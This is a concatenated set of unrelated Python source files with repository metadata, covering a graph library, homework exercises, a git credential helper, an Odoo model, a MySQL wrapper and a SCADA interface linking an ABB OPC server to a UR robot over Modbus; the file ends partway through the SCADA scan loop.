self._specijalista.get(), self._pacijent)
KalendarServis().posalji_zahtev_za_pregled_kod_specijaliste(zakazivanjeDTO)
messagebox.showinfo('USPESNO', 'Uspesno ste zakazali operaciju')
self._root.destroy()
def poziv_forme_zahtev_za_pregled_lop(korisnicko_ime_pacijenta):
root = Tk()
root.geometry('550x240')
application = ZahtevZaPregledKodSpecijaliste(root, korisnicko_ime_pacijenta)
root.mainloop()
| [
"soviljnikola3@gmail.com"
] | soviljnikola3@gmail.com |
5d8f24ea66b58048348f8f8f95f24941eae56322 | 86cac85def7eaca88c2a8b87136bd8c7811d2f06 | /graffiti/legacy/core.py | 39ee9248285cd54a67a972d8efe05226fc522a35 | [
"MIT",
"LicenseRef-scancode-unknown-license-reference"
] | permissive | suimong/graffiti | 54bce6c6038a622cb62bfc5daa3f15cceffe52eb | 54a1b950d8b1181b407c3c2675bbfac45436a525 | refs/heads/master | 2021-05-27T19:04:34.069028 | 2014-06-10T02:56:27 | 2014-06-10T02:56:27 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 4,399 | py | #!/usr/bin/env python
# Copyright (c) 2014 Michael-Keith Bernard
# Permission is hereby granted, free of charge, to any person obtaining a copy of
# this software and associated documentation files (the "Software"), to deal in
# the Software without restriction, including without limitation the rights to
# use, copy, modify, merge, publish, distribute, sublicense, and/or sell copies of
# the Software, and to permit persons to whom the Software is furnished to do so,
# subject to the following conditions:
#
# The above copyright notice and this permission notice shall be included in all
# copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, FITNESS
# FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR
# COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER
# IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN
# CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE SOFTWARE.
from graffiti import util
from graffiti.legacy import keys
from graffiti.legacy import strategy
__author__ = "Michael-Keith Bernard"
class GraphError(Exception):
pass
def build_nodes(graph):
"""Gather function metadata for graph nodes"""
acc = {}
for k, v in graph.iteritems():
if callable(v):
acc[k] = util.fninfo(v)
else:
acc[k] = v
return acc
def deps_for(nodes, key):
"""Find all dependencies for a key in a given graph"""
def _deps(key, path):
if key not in nodes:
return [key]
if key in path:
msg = "Cycle detected between {} and {}".format(
path[0], path[-1])
raise GraphError(msg)
deps = nodes[key]["required"]
trans = [_deps(dep, path + [key]) for dep in deps]
return set(util.concat(deps, *trans))
return _deps(key, [])
def build_dependency_tree(nodes):
"""Find all dependencies for all keys in a given graph"""
return { k: deps_for(nodes, k) for k in nodes.keys() }
def graph_parameters(nodes):
"""Gather all required and optional inputs and outputs."""
out = set(nodes)
rin, oin = set(), set()
for node in nodes.values():
rin |= node["required"]
oin |= set(node["optional"])
return (rin - out, oin, out)
def graph_nodes(dependencies):
"""Find all nodes referenced by this graph"""
return set.union(set(dependencies), *dependencies.values())
def compile_graph(descriptor):
"""Compile a graph descriptor into a graph"""
nodes = build_nodes(keys.simplify(descriptor))
deps = build_dependency_tree(nodes)
node_names = graph_nodes(deps)
req, opt, out = graph_parameters(nodes)
return {
"descriptor": descriptor,
"nodes": nodes,
"dependencies": deps,
"required_inputs": req,
"optional_inputs": opt,
"outputs": out,
"node_names": node_names,
}
def call_graph(graph, key, inputs):
"""Call a node in the graph with the correct subset of required and optional
keys from the inputs
"""
node = graph["nodes"][key]
acceptable = node["required"] | set(node["optional"])
req = util.select_keys(lambda k, _: k in acceptable, inputs)
args = util.merge(node["optional"], req)
return node["fn"](**args)
def run_once(graph, inputs, required=None):
"""Evaluate a single set of satisfiable dependecies. `required` is the set
of keys that should be evaluated, or None for all keys
"""
if required and set(inputs) >= required:
return inputs
sat = strategy.satisfied_by(graph["nodes"], inputs)
if required:
sat &= set(required)
new_vals = { k: call_graph(graph, k, inputs) for k in sat }
return util.merge(inputs, new_vals)
def run_graph(graph, inputs, *keys):
"""Run a graph given a set of inputs and, optionally, a subset of keys from
the graph
"""
if inputs is None:
inputs = {}
required = strategy.find_requirements(graph, inputs, keys)
runner = lambda inputs: run_once(graph, inputs, required)
solved = util.fixpoint(runner, inputs)
if set(solved) < required:
raise GraphError("Unsatisfiable dependencies")
return solved
| [
"mkbernard.dev@gmail.com"
] | mkbernard.dev@gmail.com |
088fac80d39437e75d6fcde58165b95188fc7a81 | c5fb0f108dc0a99adf772b075a3f3fc487a92a40 | /Homeworks/hw1/hw1_part3.py | a0e9b3bf6aea63168967d36c0932c8dfa206f84d | [] | no_license | ujjwalrehani/Various-Python-Projects | 7e86eed01eb4716f1946d6082b9c319d0021c7ba | 00950d669f3536fab061c167918bd8755c694b8f | refs/heads/master | 2021-09-04T03:06:20.605344 | 2018-01-15T02:17:17 | 2018-01-15T02:17:17 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 274 | py | # File: hw1_part3.py
# Author: Ujjwal Rehani
# Date: 2/9/2017
# Section: 21
# E-mail: urehani1@umbc.edu
# Description:
# Prints out the name of a dog
def main():
dogName = input("What is the name of your dog? ")
print(dogName,"is a good dog!")
main() | [
"noreply@github.com"
] | noreply@github.com |
a2c60ae4eba6bb1bd7bc7d9d5bb25bc5a6ea9707 | 4f875744ccae8fa9225318ce16fc483b7bf2735e | /google/thief.py | 784a8691a8ab6fa23fd45c46215f40a55bbe01b8 | [] | no_license | nguyenngochuy91/companyQuestions | 62c0821174bb3cb33c7af2c5a1e83a60e4a29977 | c937fe19be665ba7ac345e1729ff531f370f30e8 | refs/heads/master | 2020-07-27T05:58:36.794033 | 2020-04-10T20:57:15 | 2020-04-10T20:57:15 | 208,893,527 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 854 | py | # -*- coding: utf-8 -*-
"""
Created on Wed Dec 11 02:40:47 2019
@author: huyn
"""
#House thief
def findMax(array):
def dfs(index,currentSum):
if index>=len(array):
return currentSum
else:
val = array[index]
first = dfs(index+1,currentSum)
second = dfs(index+2,currentSum+val)
return max(first,second)
return dfs(0,0)
#print(findMax([2, 5, 1, 3, 6, 2, 4]))
#print(findMax([2, 10, 14, 8, 1]))
def findMaxDP(array):
dp = [0]*len(array)
def dfs(index):
if index<len(array):
if dp[index]==0:
dp[index] = max(array[index]+dfs(index+2),dfs(index+1))
return dp[index]
else:
return 0
dfs(0)
return dp[0]
print(findMaxDP([2, 5, 1, 3, 6, 2, 4]))
print(findMaxDP([2, 10, 14, 8, 1])) | [
"huyn@cvm6h4zv52.cvm.iastate.edu"
] | huyn@cvm6h4zv52.cvm.iastate.edu |
2b21fb9ae2fb93f790d20b26464fd232360fec12 | 609e436525e2edde0c72a90f49c49adf23ec7771 | /bin/git-credential-mvl | 3d0fc421d5ae518820fc531163428b2af5fcffcb | [] | no_license | MontaVista-OpenSourceTechnology/opencgx-qemu-4.14-2.4 | 78ed77440969c160cf474d6d02f9e718c5a9d4ff | d4fcc7ab1e5f653dce84475621f6bc6bf907460f | refs/heads/master | 2021-04-09T15:20:18.731769 | 2019-09-20T04:21:30 | 2019-09-20T04:21:30 | 125,580,162 | 2 | 1 | null | null | null | null | UTF-8 | Python | false | false | 2,699 | #!/usr/bin/env python
#
# Copyright (c) 2009-2018 MontaVista Software, LLC. All rights reserved.
#
# This file is licensed under the terms of the GNU General Public License
# version 2. This program is licensed "as is" without any warranty of any
# kind, whether express or implied.
#
from optparse import OptionParser, OptionGroup
import sys
from MVLContent.MVLContentTools import ContentTools, getUserFromPasswordManager, removeUserFromPasswordManager
import logging
def main():
parser = OptionParser()
parser.add_option("--username", dest="username", default=None, help="set username", metavar="<username>")
parser.add_option("--password", dest="password", default=None, help="set password", metavar="<password>")
parser.add_option("-d", "--debug", action="store_true", dest="isDebug", default=False, help="print debug messages")
# parser all arguments
(options,arguments) = parser.parse_args()
# setup logger
logger = logging.getLogger("git-credential-mvl")
ch = logging.StreamHandler()
formatter = logging.Formatter("%(asctime)s - %(name)s - %(levelname)s - %(message)s")
ch.setFormatter(formatter)
logger.addHandler(ch)
if len(arguments) > 1:
sys.stderr.write("Too many arguments")
else:
operation = arguments[0]
#Set defaults
protocol=None
host=None
username=None
password=None
# Parse input from git
for line in sys.stdin.readlines():
if line.startswith("protocol="):
protocol = line.split("=")[1].strip()
if line.startswith("host="):
host = line.split("=")[1].strip()
if line.startswith("password="):
password = line.split("=")[1].strip()
if line.startswith("username="):
username = line.split("=")[1].strip()
if protocol and host:
options.uri="%s://%s" % (protocol, host)
else:
sys.stderr.write("Didn't get host or protocol values\n")
sys.exit(1)
if username:
options.username = username
if password:
options.password = password
contentTools = ContentTools(options)
user = getUserFromPasswordManager(logger)
if operation == "get":
if user:
print("username={0}".format(user.getUsername()))
print("password={0}".format(user.getPassword()))
elif operation == "store":
getUserFromPasswordManager(logger)
elif operation == "erase":
if user:
removeUserFromPasswordManager(user,logger)
else:
print "Invalid git operation"
if __name__ == "__main__":
main()
| [
"jpuhlman@mvista.com"
] | jpuhlman@mvista.com | |
75255d7bcc26d834bc28fb695b7bbfa7b76cdbd3 | 3f2cdb121443859eb029b348ca1493b196c12732 | /basic-mathematical-operations.py | 93182d0818aad204834859bc0a03b80ddbe9ed76 | [] | no_license | c0ns0le/coding-puzzles | ef31d78dc7b5df72415930be55b555c888a5e790 | e15aec28a679f3298a30fd64ee6cf4c2d27350f1 | refs/heads/master | 2020-04-04T17:49:47.445579 | 2018-10-01T01:05:23 | 2018-10-01T01:05:23 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 674 | py | # Basic Mathematical Operations: 8 KYU
# Your task is to create a function that does four basic mathematical operations.
# The function should take three arguments - operation(string/char), value1(number), value2(number).
# The function should return result of numbers after applying the chosen operation.
def basic_op(operation, value1, value2):
if operation == "+": return value1 + value2
if operation == "-": return value1 - value2
if operation == "*": return value1 * value2
if operation == "/": return value1 / value2
print(basic_op('+', 4, 7)) # 11
print(basic_op('-', 15, 18)) # -3
print(basic_op('*', 5, 5)) # 25
print(basic_op('/', 49, 7)) # 7
| [
"ali07cat07@gmail.com"
] | ali07cat07@gmail.com |
0bc2774a6e2cb8b814c0c550dee7cc21c4f335d3 | 9a4fbcc3736521bc4f5d9e483f8c8a996044e31c | /bss_crm_phonenumbers/models/crm_lead.py | 12cfd7787b66716d85ce36686e825e6bd0b4f6b3 | [] | no_license | bluestar-solutions/openerp-bss-phonenumbers-addons | 353cd82c5a97e9447cab6d8a3479814a69d4718a | b9eeff666063f1d269ed50de6bfe0e3882b4f2f5 | refs/heads/master | 2020-05-19T16:32:11.052093 | 2019-10-02T13:41:02 | 2019-10-02T13:41:02 | 35,479,882 | 1 | 1 | null | null | null | null | UTF-8 | Python | false | false | 363 | py | # -*- coding: utf-8 -*-
# Part of CRM Phone Numbers.
# See LICENSE file for full copyright and licensing details.
from odoo import models
from odoo.addons.bss_phonenumbers import fields # @UnresolvedImport
class Lead(models.Model):
_inherit = 'crm.lead'
phone = fields.Phone("Phone")
mobile = fields.Phone("Mobile")
fax = fields.Phone("Fax")
| [
"herve.martinet@bluestar.solutions"
] | herve.martinet@bluestar.solutions |
b51cd3b37da09322d7f9b8aafe925465055d0aec | 3090557f9979c7c36490949b27012e245c65ff67 | /advanced_routing/server.py | b77caaa0255cf2c82b665936632272349eda3fae | [] | no_license | Biniamguchi/Flask | 859113d8dd3a664180cd2ad5ac39d7efec48a7ed | c932ab8aafd217508a393cfbc4c93737e9de1820 | refs/heads/master | 2021-08-24T07:56:17.475002 | 2017-12-08T18:40:58 | 2017-12-08T18:40:58 | 109,214,346 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 401 | py | from flask import Flask, render_template
app = Flask(__name__)
@app.route('/')
def index():
return render_template("user.html", phrase="hello", times=10)
app.run(debug=True)
# from flask import Flask, render_template, request, redirect
# app = Flask(__name__)
# @app.route('/users/<jay>')
# def show_user_profile(jay):
# print jay
# return render_template("user.html")
# app.run(debug=True) | [
"biniam22@gmail.com"
] | biniam22@gmail.com |
253bd22eeac212547fe5cd4922cf478d51db7277 | f41bdcf118ce9c4ba374a33475fd9626bf3db905 | /klasa 1/sql/fake_apps/fake_apps.py | 52604f726248f8628828457684969c3287274991 | [] | no_license | nikolaCh6/nikolaCh6 | 376005812dc49b5c41af95ef0c1b8d3caed7a21d | 5c60aa63bd37c8594ce09b60d32f8cd1b0941e9b | refs/heads/master | 2021-06-16T11:30:21.837301 | 2019-10-18T10:53:59 | 2019-10-18T10:53:59 | 105,507,076 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,345 | py | #!/usr/bin/env python
# -*- coding: utf-8 -*-
import sqlite3
import csv
def dane_z_pliku(nazwa_pliku):
dane = [] # pusta lista na dane
with open(nazwa_pliku, 'r', newline='', encoding='utf-8') as plik:
tresc = csv.reader(plik, delimiter='\t')
for rekord in tresc:
rekord = [x.strip() for x in rekord] # oczyszczamy dane
dane.append(rekord) # dodawanie rekordów do listy
return dane
def kwerenda_1(cur):
cur.execute("""
SELECT * FROM fake_apps
""")
wyniki = cur.fetchall() # pobranie wszystkich rekordów
for row in wyniki: # odczytywanie rekordów
print(tuple(row)) # drukowanie pól
def main(args):
con = sqlite3.connect('fake_apps.db') # połączenie z bazą
cur = con.cursor() # utworzenie kursora
# utworzenie tabeli w bazie
with open('fake_apps.sql', 'r') as plik:
cur.executescript(plik.read())
# dodawanie danych do bazy
fake_apps = dane_z_pliku('fake_apps.txt')
fake_apps.pop(0) # usuń pierwszy rekord z listy
cur.executemany('INSERT INTO fake_apps VALUES(?, ?, ?, ?, ?)', fake_apps)
kwerenda_1(cur)
con.commit() # zatwierdzenie zmian w bazie
con.close() # zamknięcie połączenia z bazą
return 0
if __name__ == '__main__':
import sys
sys.exit(main(sys.argv))
| [
"nikolachmiel6@gmail.com"
] | nikolachmiel6@gmail.com |
99fe4cfdf0cb813cd50858f019141ceab71fce96 | 6dca81c7387ec92144dd1908855589e1c92c4057 | /IutyLib/database/dbbase.py | ae083623aeb6a563ee9698c015d896406a823d3a | [
"MIT"
] | permissive | Iuty/iutylib | bf2010712e3c9d31f00b3ed1bd0d16ec9c5f6350 | 763972642c536aeec352001e649a884784d19a40 | refs/heads/master | 2023-01-23T13:51:01.365025 | 2020-11-19T06:43:43 | 2020-11-19T06:43:43 | 218,896,116 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 15,176 | py | from IutyLib.database.exceptions import *
from abc import abstractmethod
import datetime
class DataBaseParam:
host = None
user = None
password = None
dbname = None
def __init__(self,host,user,password,dbname,port=3306):
self.host = host
self.user = user
self.port = port
self.password = password
self.dbname = dbname
pass
class Column:
AutoIncrement = False
PrimaryKey = False
IsIndex = False
UnionIndex = False
IsUnique = False
NullAble = True
Length = None
Default = None
Enum = []
Type = int
def __init__(self,**kwargs):
if 'AutoIncrement' in kwargs:
self.AutoIncrement = kwargs['AutoIncrement']
if 'NullAble' in kwargs:
self.NullAble = kwargs['NullAble']
if 'PrimaryKey' in kwargs:
self.PrimaryKey = kwargs['PrimaryKey']
if self.PrimaryKey:
self.NullAble = False
if 'IsIndex' in kwargs:
self.IsIndex = kwargs['IsIndex']
if 'UnionIndex' in kwargs:
self.UnionIndex = kwargs['UnionIndex']
if 'IsUnique' in kwargs:
self.IsUnique = kwargs['IsUnique']
if 'Length' in kwargs:
self.Length = kwargs['Length']
if 'Default' in kwargs:
self.Default = kwargs['Default']
if 'Enum' in kwargs:
self.Enum = kwargs['Enum']
if 'Type' in kwargs:
self.Type = kwargs['Type']
def getType(self):
if not self.Length == None:
length = str(self.Length)
if self.Type == int:
if self.Length == None:
length = "11"
return "int" + "(" + length + ")"
if self.Type == float:
return "float"
if self.Type == str:
if self.Length == None:
length = "255"
t = "varchar" + "(" + length + ")"
if len(self.Enum) > 0:
t = "enum("
enumstr = ""
for e in self.Enum:
if len(enumstr) > 0:
enumstr += ','
enumstr += ("\'" + e + "\'")
t += enumstr
t += ")"
return t
if self.Type == datetime.date:
return "date"
if (self.Type == datetime.timedelta) | (self.Type == datetime.time):
if self.Length == None:
length = "6"
return "time" + "(" + length + ")"
if self.Type == datetime.datetime:
if self.Length == None:
length = "6"
return "datetime" + "(" + length + ")"
if self.Type == bytes:
if self.Length == None:
length = "255"
return "varchar" + "(" + length + ")"
def getSqlStr(self):
colstr = ""
colstr += (" " + self.getType())
if self.PrimaryKey:
colstr += " primary key"
self.NullAble = False
if not self.NullAble:
colstr += " not null"
if (self.Default is None) & (self.NullAble):
colstr += " default NULL"
if not self.Default is None:
colstr += (" Default" + '\'' + self.Default + '\'')
if self.AutoIncrement:
colstr += " AUTO_INCREMENT"
return colstr
pass
class SqlDataBase(DataBaseParam):
_db = None
def __init__(self,host,user,password,dbname,port=3306,**kwargs):
DataBaseParam.__init__(self,host,user,password,dbname,port)
self.Model = self.getModel.__call__()
self._dbname = dbname
pass
def getModel(self):
class Model:
_db = self
def getColumns(self):
columns = {}
for item in self.__class__.__dict__:
if self.__class__.__dict__[item].__class__ == Column:
columns[item] = self.__class__.__dict__[item]
return columns
def getDBColumns(self):
tablename = self.__class__.__name__
return self._db.getColumnDefine(tablename)
def checkColumn(self):
columns = self.getColumns()
dbcolumns = self.getDBColumns()
for col in columns:
if col.startswith('_'):
continue
column = columns[col]
checkok = False
for dbcolumn in dbcolumns:
if dbcolumn['column_name'] == col:
if column.getType() != dbcolumn['COLUMN_TYPE']:
self._db.alterColumn(self.__class__.__name__,col,column.getSqlStr())
checkok = True
continue
nullable = 'YES'
if not column.NullAble:
nullable = 'NO'
if nullable != dbcolumn['IS_NULLABLE']:
self._db.alterColumn(self.__class__.__name__,col,column.getSqlStr())
checkok = True
continue
checkok = True
continue
if not checkok:
print(col)
self._db.addColumn(self.__class__.__name__,col,column.getSqlStr())
def check(self,**kwargs):
self.creat()
self.checkColumn()
pass
def creat(self,**kwargs):
if self._db.isTableExists(self.__class__.__name__):
return
kwargs['table'] = self.__class__.__name__.lower()
columns = self.getColumns()
for column in columns:
if not 'columns' in kwargs:
kwargs['columns'] = {}
kwargs['columns'][column] = columns[column]
data = self._db.excuteCreat.__call__(**kwargs)
return data
def query(self,**kwargs):
kwargs['table'] = self.__class__.__name__.lower()
data = self._db.excuteQuery.__call__(**kwargs)
return data
def add(self,**kwargs):
kwargs['table'] = self.__class__.__name__.lower()
data = self._db.excuteAdd.__call__(**kwargs)
return data
def delete(self,**kwargs):
kwargs['table'] = self.__class__.__name__.lower()
data = self._db.excuteDelete.__call__(**kwargs)
return data
def update(self,**kwargs):
kwargs['table'] = self.__class__.__name__.lower()
data = self._db.excuteUpdate.__call__(**kwargs)
return data
def drop(self,**kwargs):
kwargs['table'] = self.__class__.__name__.lower()
data = self._db.excuteDrop.__call__(**kwargs)
return data
def tables(self,**kwargs):
data = self._db.excuteTableInfo.__call__(**kwargs)
return data
return Model
def isTableExists(self,tablename):
sqlstr = "select table_name from information_schema.tables where table_schema=\'"
sqlstr += self.dbname
sqlstr += '\' and table_type=\'base table\''
sqlstr += ' and table_name ='
sqlstr += (" \'" + tablename + "\'")
#print(sqlstr)
db0 = self.excuteSql(sqlstr)
data = []
for d in db0:
data.append(d)
if len(data) > 0:
return True
return False
def getColumnDefine(self,tablename):
sqlstr = "select column_name,COLUMN_TYPE,COLUMN_KEY,IS_NULLABLE from information_schema.columns where table_schema= "
sqlstr += ("\'" + self.dbname + "\'")
sqlstr += " and table_name = "
sqlstr += ("\'" + tablename + "\'")
#log here
#print(sqlstr)
db0 = self.excuteSql(sqlstr)
data = []
for d in db0:
data.append(d)
return data
def alterColumn(self,tablename,columnname,alterstr):
sqlstr = "alter table"
sqlstr += (' `' + tablename + '`')
sqlstr += " Modify Column"
sqlstr += (' `' + columnname + '`')
sqlstr += (' ' + alterstr)
#log here
#print(sqlstr)
db0 = self.excuteSql(sqlstr)
data = []
for d in db0:
data.append(d)
return data
def addColumn(self,tablename,columnname,alterstr):
sqlstr = "alter table"
sqlstr += (' `' + tablename + '`')
sqlstr += " Add Column"
sqlstr += (' `' + columnname + '`')
sqlstr += (' ' + alterstr)
#log here
print(sqlstr)
db0 = self.excuteSql(sqlstr)
data = []
for d in db0:
data.append(d)
return data
def excuteCreat(self,**kwargs):
sqlstr = "CREATE TABLE "
if not 'table' in kwargs:
raise TableError('Creat Has No Table')
sqlstr += ("`" + kwargs['table'] + "`")
if not 'columns' in kwargs:
raise TableError('Creat Has No Column')
colstr = ""
indexstr = ""
unionindexstr = ""
for col in kwargs['columns']:
colobj = kwargs['columns'][col]
if len(colstr) > 0:
colstr += ','
colstr += ("`" + col + "`")
colstr += colobj.getSqlStr()
if colobj.IsIndex:
if not colobj.UnionIndex:
indexstr += ("," + "Index" + " " + "`" + col + "`" + " " + "(`" + col + "`)")
else:
if len(unionindexstr) > 0:
unionindexstr += ","
unionindexstr += ("`" + col + "`")
if len(unionindexstr) > 0:
unionindexstr = "," + "Index" + " " + "`union`" + " " + "(" + unionindexstr + ")"
sqlstr += ("(" + colstr + indexstr + unionindexstr +")")
#log here
#print(sqlstr)
db0 = self.excuteSql(sqlstr)
data = []
for d in db0:
data.append(d)
return data
def excuteDrop(self,**kwargs):
sqlstr = "DROP TABLE"
if not 'table' in kwargs:
raise TableError('Drop Has No Table')
sqlstr += ("`" + kwargs['table'] + "`")
db0 = self.excuteSql(sqlstr)
data = []
for d in db0:
data.append(d)
return data
def excuteTableInfo(self,**kwargs):
sqlstr = "SELECT TABLE_NAME FROM information_schema.TABLES where Table_SCHEMA = '{0}'".format(self._dbname)
if 'orderby' in kwargs:
sqlstr += (" " + "order by" + " " + kwargs['orderby'])
db0 = self.excuteSql(sqlstr)
data = []
for d in db0:
data.append(d)
return data
@abstractmethod
def connect(self):
pass
def excuteSql(self,sqlstr):
dbx = self.connect()
db0 = dbx.cursor(self._db.cursors.DictCursor)
db0.execute(sqlstr)
db0.close()
dbx.close()
return db0
def excuteQuery(self,**kwargs):
sqlstr = "select "
target = '*'
if 'target' in kwargs:
target = kwargs['target']
sqlstr += (target + ' ')
if not 'table' in kwargs:
raise QueryError('Query Has No Table')
sqlstr += ('from ' + "`" + kwargs['table'] + "`" + ' ')
if 'join' in kwargs:
sqlstr += (kwargs['join'] + ' ')
if 'where' in kwargs:
sqlstr += ("where " + kwargs['where'] + ' ')
if 'groupby' in kwargs:
sqlstr += ("group by " + kwargs['groupby'] + ' ')
if 'orderby' in kwargs:
sqlstr += ("order by " + kwargs['orderby'] + ' ')
#Having here
if 'limit' in kwargs:
sqlstr += ("limit " + kwargs['limit'] + ' ')
#log here
print(sqlstr)
db0 = self.excuteSql(sqlstr)
data = []
for d in db0:
data.append(d)
return data
def excuteAdd(self,**kwargs):
sqlstr = 'insert into '
if not 'table' in kwargs:
raise AddError('Add Has No Table')
sqlstr += ("`" + kwargs['table'] + "`")
if not 'value' in kwargs:
raise AddError('Add Has No Value')
fields = ""
values = ""
firstvalue = kwargs['value'].pop(0)
for v in firstvalue:
if len(fields) > 0:
fields+=","
values+=","
fields += v
values += '\'{0}\''.format(firstvalue[v])
sqlstr += ("(" + fields + ") ")
sqlstr += "values "
sqlstr += ("(" + values + ")")
for val in kwargs['value']:
values = ''
for v in val:
if len(values)>0:
values+=","
values += '\'{0}\''.format(val[v])
sqlstr += (",(" + values + ")")
#log here
#print(sqlstr)
db0 = self.excuteSql(sqlstr)
data = []
for d in db0:
data.append(d)
return data
def excuteDelete(self,**kwargs):
sqlstr = "delete from "
if not 'table' in kwargs:
raise DeleteError('Delete Has No Table')
sqlstr += (kwargs['table'] + ' ')
if 'where' in kwargs:
sqlstr += ("where " + kwargs['where'])
#log here
db0 = self.excuteSql(sqlstr)
data = []
for d in db0:
data.append(d)
return data
def excuteUpdate(self,**kwargs):
sqlstr = "update "
if not 'table' in kwargs:
raise DeleteError('Update Has No Table')
sqlstr += (kwargs['table'] + ' ')
if not 'value' in kwargs:
raise DeleteError('Update Has No Value')
sqlstr += "set "
setstr = ""
for val in kwargs['value']:
for v in val:
if len(setstr) > 0:
setstr += ','
#print(val[v])
setstr += (v + '=' + '\'' + str(val[v]) + '\'')
sqlstr += setstr
if 'where' in kwargs:
sqlstr += ("where " + kwargs['where'])
#log here
print(sqlstr)
db0 = self.excuteSql(sqlstr)
data = []
for d in db0:
data.append(d)
return data
| [
"dfdfggg@126.com"
] | dfdfggg@126.com |
457c90bdeecb80fe725ae8d148b6a12d7552e0b7 | 9e6f5a9db0dda137d80e57106c50ede468f70196 | /SCADA.py | ca54c1037107ea1609ddec8a250da982d674ac91 | [] | no_license | lucazanrosso/Python-Scada | ee07b339d53fb84f54169fe3c3be87ca9331e88b | fbaa970d838860dddc068c6528e6170ae1447be0 | refs/heads/main | 2023-04-24T05:31:38.907605 | 2021-05-13T18:38:26 | 2021-05-13T18:38:26 | 304,403,928 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 12,352 | py | import tkinter as tk
from pymodbus.client.sync import ModbusTcpClient
import OpenOPC
import pywintypes
# Compatibility shim: alias pywintypes.datetime back to TimeType so OpenOPC's
# timestamp handling keeps working on newer pywin32 builds.
# NOTE(review): presumably compensates for a pywin32 API rename — confirm
# against the installed pywin32/OpenOPC versions.
pywintypes.datetime = pywintypes.TimeType

# Main application window for the SCADA interface.
root = tk.Tk()
root.title("SCADA Interface")
def scan_abb():
    """Browse for registered OPC-DA servers and show the first one in the UI."""
    first_server = opc_client.servers()[0]
    label_abb_server.config(text="ABB Server: " + first_server)
def connect_abb():
    """Open the OPC-DA session to the ABB controller and mark the link up."""
    global opc_server_name
    target = opc_client.servers()[0]
    opc_client.connect(target, entry_abb_address.get())
    # Dump the server's top-level namespace for diagnostics, then cache it so
    # the other callbacks can build full tag paths from opc_server_name[0].
    print(opc_client.list())
    opc_server_name = opc_client.list()
    label_status_abb.config(text="Status: Connected")
    canvas_status_abb.itemconfig(lamp_status_abb, fill='green')
def disconnect_abb():
    """Close the OPC-DA session and mark the ABB link as down."""
    opc_client.close()
    label_status_abb.config(text="Status: Disconnected")
    canvas_status_abb.itemconfig(lamp_status_abb, fill='red')
def scan_and_connect_ur():
    """Connect to the UR robot's Modbus/TCP server on port 502.

    Reads the target IP from the address entry, replaces the module-level
    ``modbus_client`` and, on success, shows the endpoint and turns the
    status lamp green.

    Bug fix: previously a failed ``connect()`` left the labels and lamp in
    whatever state they had before, giving the operator no feedback.  The
    failure path now reports it explicitly and forces the lamp red.
    """
    global modbus_client
    modbus_client = ModbusTcpClient(entry_ur_address.get(), 502)
    if modbus_client.connect():
        label_ur_server["text"] = ("UR Server: " + modbus_client.host +
                                   " Port: " + str(modbus_client.port))
        label_status_ur["text"] = "Status: Connected"
        canvas_status_ur.itemconfig(lamp_status_ur, fill='green')
    else:
        # Explicit failure feedback instead of silently doing nothing.
        label_status_ur["text"] = "Status: Connection failed"
        canvas_status_ur.itemconfig(lamp_status_ur, fill='red')
def disconnect_ur():
    """Drop the Modbus/TCP session and mark the UR link as down."""
    modbus_client.close()
    label_status_ur.config(text="Status: Disconnected")
    canvas_status_ur.itemconfig(lamp_status_ur, fill='red')
def set_scan(value):
    """Enable or disable the cyclic variable scan and update its lamp.

    When enabled, kicks off scan_variables(), which keeps rescheduling
    itself while the module-level ``scan`` flag stays truthy.
    """
    global scan
    scan = value
    if not scan:
        canvas_scanning.itemconfig(lamp_scanning, fill='red')
        return
    canvas_scanning.itemconfig(lamp_scanning, fill='green')
    scan_variables()
def scan_variables():
    """One cycle of the gateway loop between the ABB (OPC-DA) and UR (Modbus).

    Mirrors the conveyor signals from the ABB controller into the UR's
    registers, services the UR's "ready" handshakes back into ABB OPC
    signals, refreshes the status lamps and production counters, and
    reschedules itself every 200 ms while ``scan`` is True.

    Register map observed in this function (UR side):
      130 written <- ABB CONVEYOR_OBJ_SUR (object-on-surface sensor)
      131 read    -> "can ready" handshake, cleared after servicing
      132 read    -> "brick ready" handshake, cleared after servicing
      133 read    -> "object verified" handshake, cleared after servicing
    """
    global opc_server_name
    if scan:
        # --- ABB -> UR: read the conveyor signals over OPC-DA.
        conveyor_fwd = opc_client.read(opc_server_name[0] + '.IOSYSTEM.IOSIGNALS.CONVEYOR_FWD')[0]
        conveyor_bwd = opc_client.read(opc_server_name[0] + '.IOSYSTEM.IOSIGNALS.CONVEYOR_BWD')[0]
        conveyor_obj_sur = opc_client.read(opc_server_name[0] + '.IOSYSTEM.IOSIGNALS.CONVEYOR_OBJ_SUR')[0]
        # Forward the object-on-surface sensor state to the UR every cycle.
        if conveyor_obj_sur == 1:
            modbus_client.write_register(130, 1)
        else:
            modbus_client.write_register(130, 0)
        # Reflect the conveyor direction signals on the UI lamps.
        if conveyor_fwd == 1:
            canvas_conveyor_fwd.itemconfig(lamp_conveyor_fwd, fill="green")
        else:
            canvas_conveyor_fwd.itemconfig(lamp_conveyor_fwd, fill="red")
        if conveyor_bwd == 1:
            canvas_conveyor_bwd.itemconfig(lamp_conveyor_bwd, fill="green")
        else:
            canvas_conveyor_bwd.itemconfig(lamp_conveyor_bwd, fill="red")
        # --- UR -> ABB: poll the handshake registers.
        can_ready = modbus_client.read_input_registers(131, 1).registers[0]
        brick_ready = modbus_client.read_input_registers(132, 1).registers[0]
        obj_verified = modbus_client.read_input_registers(133, 1).registers[0]
        # Each handshake is acknowledged by writing the matching ABB OPC
        # signal and then clearing the UR register (edge-style protocol).
        if obj_verified == 1:
            opc_client.write((opc_server_name[0] + '.IOSYSTEM.IOSIGNALS.objeto_Verificado', 1))
